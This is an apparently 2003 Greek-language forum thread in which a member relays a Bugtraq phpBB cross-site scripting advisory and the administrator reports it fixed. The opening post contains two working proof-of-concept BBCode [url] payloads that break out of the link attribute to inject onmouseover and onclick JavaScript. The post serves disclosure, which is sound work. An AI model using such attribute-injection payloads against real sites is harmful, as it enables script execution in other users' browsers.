XSS vulnerability in phpBB

Ερωτήσεις για προβλήματα και προτάσεις σχετικές με την σελίδα του freestuff.gr.
Παρακαλώ μη βάζετε εδώ γενικές ερωτήσεις που δεν αφορούν την σελίδα μας.

Συντονιστής: Super-Moderators

Απάντηση
Άβαταρ μέλους
Panos Galanis
Δημοσιεύσεις: 158
Εγγραφή: 09 Σεπ 2002 12:51
Τοποθεσία: Hamburg

XSS vulnerability in phpBB

Δημοσίευση από Panos Galanis » 11 Σεπ 2003 11:20

Απο bugtraq "XSS vulnerability in phpBB"

ΠΡΟΣΟΧΗ:
Το post έγινε για να ενημερωθείτε! Τα παρακάτω link επιτρέπουν javascript μέσα στο forum!

++++++++++++++++++++++++++++++++++++++++++++

Εδώ το τέστ:

[url=http://www.google.com" onmouseover="alert('Oups! Javascript')"]Hover: alert - Click: Google.com[/url]

Και ενα πολύ άσχημο:
[url=http://www.google.com" onclick="self.close()"]OnClick window.close() - Click: Google.com[/url]

++++++++++++++++++++++++++++++++++++++++++++


References

http://www.securityfocus.com/search?cat ... &query=XSS
Human beings, who are almost unique in having the ability to learn from the experience of others, are also remarkable for their apparent disinclination to do so. - Douglas Adams

Άβαταρ μέλους
cordis
Administrator, [F|H]ounder, [C|S]EO
Δημοσιεύσεις: 27616
Εγγραφή: 09 Οκτ 1999 03:00
Τοποθεσία: Greece
Επικοινωνία:

XSS vulnerability in phpBB

Δημοσίευση από cordis » 13 Σεπ 2003 16:49

fixed ;)
Δεν απαντάω σε προσωπικά μηνύματα με ερωτήσεις που καλύπτονται από τις ενότητες του forum. Για ο,τι άλλο είμαι εδώ για εσάς.
- follow me @twitter

Άβαταρ μέλους
cvoodan
Honorary Member
Δημοσιεύσεις: 2151
Εγγραφή: 13 Μάιος 2003 14:09
Τοποθεσία: Πίσω σου!

XSS vulnerability in phpBB

Δημοσίευση από cvoodan » 13 Σεπ 2003 21:57

τσακάλι... :kaloe:
Εικόνα

Απάντηση

Επιστροφή στο “Υποστήριξη και προτάσεις”

Μέλη σε σύνδεση

Μέλη σε αυτήν τη Δ. Συζήτηση: Δεν υπάρχουν εγγεγραμμένα μέλη και 1 επισκέπτης